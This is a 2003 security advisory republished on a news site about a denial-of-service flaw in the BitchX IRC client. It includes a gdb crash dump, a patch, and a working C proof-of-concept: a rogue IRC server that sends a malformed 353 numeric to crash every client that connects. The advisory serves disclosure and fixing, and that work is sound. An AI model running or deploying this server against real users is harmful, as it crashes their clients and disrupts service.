Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » BitchX-353 Vulnerability

BitchX-353 Vulnerability

by Nikola Strahija on February 18th, 2003 A denial of service vulnerability exists in BitchX.


1. Topic:
BitchX IRC Client

2. Relevant versions:
Vulnerable:
BitchX-75p3
BitchX-1.0c16
BitchX-1.0c19
BitchX-1.0c20cvs
Not Vulnerable:
BitchX-1.0c18

3. Problem description:
A denial of service vulnerability exists in BitchX. Sending
a malformed RPL_NAMREPLY numeric 353 causes BitchX to segfault.
This problem was reported to [email protected]#bitchx on
Jan 30 2003, as of this writing we are unaware of any patches
or workarounds provided by panasync and or any members of
#bitchx

4. Workaround:
Patch Included
Use epic, ircII

5. References:
http://www.bitchx.org
http://www.epicsol.org
http://www.ircii.org

6. Contact:
[email protected]


- -----begin gdb.output-----
[email protected]:~/BitchX_353/BitchX/source$ gdb ./BitchX
Reading symbols from ./BitchX...done.
(gdb) r argv.matrux.net
Starting program: /home/argv/BitchX_353/BitchX/source/./BitchX argv.matrux.net
BitchX - Based on EPIC Software Labs epic ircII (1998).
Version (BitchX-1.0c20cvs) -- Date (20020325).
Process [30890]
Program received signal SIGSEGV, Segmentation fault.
0x80bcdff in funny_namreply ()
(gdb) info reg
eax 0x0 0
ecx 0xbfffcf34 -1073754316
edx 0x0 0
ebx 0xbfffcf2c -1073754324
esp 0xbfffcc94 0xbfffcc94
ebp 0xbfffd7b5 0xbfffd7b5
esi 0xbfffd7b8 -1073752136
edi 0x0 0
eip 0x80bcdff 0x80bcdff
eflags 0x10282 66178
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x20 32
ftag 0xffff 65535
fiseg 0x23 35
fioff 0x80d1c7c 135076988
foseg 0x2b 43
fooff 0xbfffe130 -1073749712
fop 0x0 0
(gdb) disass $eip-0x20 $eip+0x20Dump of assembler code from 0x80bcddf to 0x80bce1f:
0x80bcddf : sbb $0x0,%al
0x80bcde1 : add %al,(%eax)
0x80bcde3 : add %al,0x26af8c4(%ebx)
0x80bcde9 : push %ebx
0x80bcdea : mov 0x318(%eax),%eax
0x80bcdf0 : call *%eax
0x80bcdf2 : mov (%ebx),%ebp
0x80bcdf4 : mov 0x4(%ebx),%esi
0x80bcdf7 : mov 0x8(%ebx),%edi
0x80bcdfa : mov %edi,%edx
0x80bcdfc : add $0x10,%esp
0x80bcdff : cmpb $0x0,(%edi)
0x80bce02 : je 0x80bce2f
0x80bce04 : mov 0x1c(%esp,1),%ecx
0x80bce08 : inc %ecx
0x80bce09 : cmpb $0x20,(%edx)
0x80bce0c : je 0x80bce1b
0x80bce0e : mov %esi,%esi
0x80bce10 : inc %edx
0x80bce11 : mov (%edx),%al
0x80bce13 : test %al,%al
0x80bce15 : je 0x80bce1b
0x80bce17 : cmp $0x20,%al
0x80bce19 : jne 0x80bce10
0x80bce1b : mov %ecx,0x1c(%esp,1)
End of assembler dump.
- -----end gdb.output-----


- -----begin BitchX-1.0c20cvs-353.diff-----
diff -Nru BitchX.orig/source/funny.c BitchX/source/funny.c
- --- BitchX.orig/source/funny.c Sun Feb 16 18:34:16 2003
+++ BitchX/source/funny.c Sun Feb 16 18:39:56 2003
@@ -260,7 +260,10 @@
type = Args[0];
channel = Args[1];
line = Args[2];
- -
+ if (channel == NULL || line == NULL) {
+ bitchsay("Invalid number of arguments for %s", __FUNCTION__);
+ return;
+ }
ptr = line;
while (*ptr)
{
- -----end BitchX-1.0c20cvs-353.diff-----


- -----begin bitchx-353.c-----
/*
* bitchx-353.c
* --argv
* Jan/30/03
*
* Vulnerable:
* BitchX-75p3
* BitchX-1.0c16
* BitchX-1.0c19
* BitchX-1.0c20cvs
*
* Not Vulnerable:
* BitchX-1.0c18 (So far..)
*
*
* Workaround:
* in function funny_namreply()
* after the PasteArgs(Args, 2);
* add in
* -- snip --
* if (Args[1] == NULL || Args[2] == NULL)
* return;
* -- unsnip --
*
* ---- the vuln code of bx -----
* PasteArgs(Args, 2);
* type = Args[0];
* channel = Args[1];
* line = Args[2];
*
* ptr = line;
* while (*ptr)
* {
* while (*ptr && (*ptr != ' '))
* ptr++;
* user_count++;
* while (*ptr && (*ptr == ' '))
* ptr++;
* }
* ------------------------------
*
* [panasync([email protected])] you would hope the irc server would be a trusted source.
* [hellman([email protected])] 'Free porn at /server irc.owned.com'
*
*/

#include
#include
#include
#include
#include
#include
#include
#include

static char shellcode[] = ":* 353 * = :n"; // <-- this could be something worse.

int acceptConnection(int fd)
{
char *ip_addr;
int descriptor, sal;
struct sockaddr_in sa;
sal = sizeof(sa);
descriptor = accept(fd, (struct sockaddr *) &sa, &sal);
if (descriptor >= 0) {
ip_addr = inet_ntoa(sa.sin_addr);
printf("Connection from %s:%dn", ip_addr, ntohs(sa.sin_port));
}
return descriptor;
}


int main(int argc, char **argv)
{
int sock, serv, port;
struct sockaddr_in server;

port = 6667;

if (argc > 1)
port = atoi(argv[1]);

memset(&server, 0, sizeof(server));
server.sin_port = htons(port);
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &serv, sizeof(int));

if (bind(sock, (struct sockaddr *) &server, sizeof(struct sockaddr_in))
== -1) {
return 0;
}

listen(sock, 1);

while (1) {
serv = acceptConnection(sock);
write(serv, shellcode, strlen(shellcode));
close(serv);
}
return 0;
}
- -----end bitchx-353.c-----


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »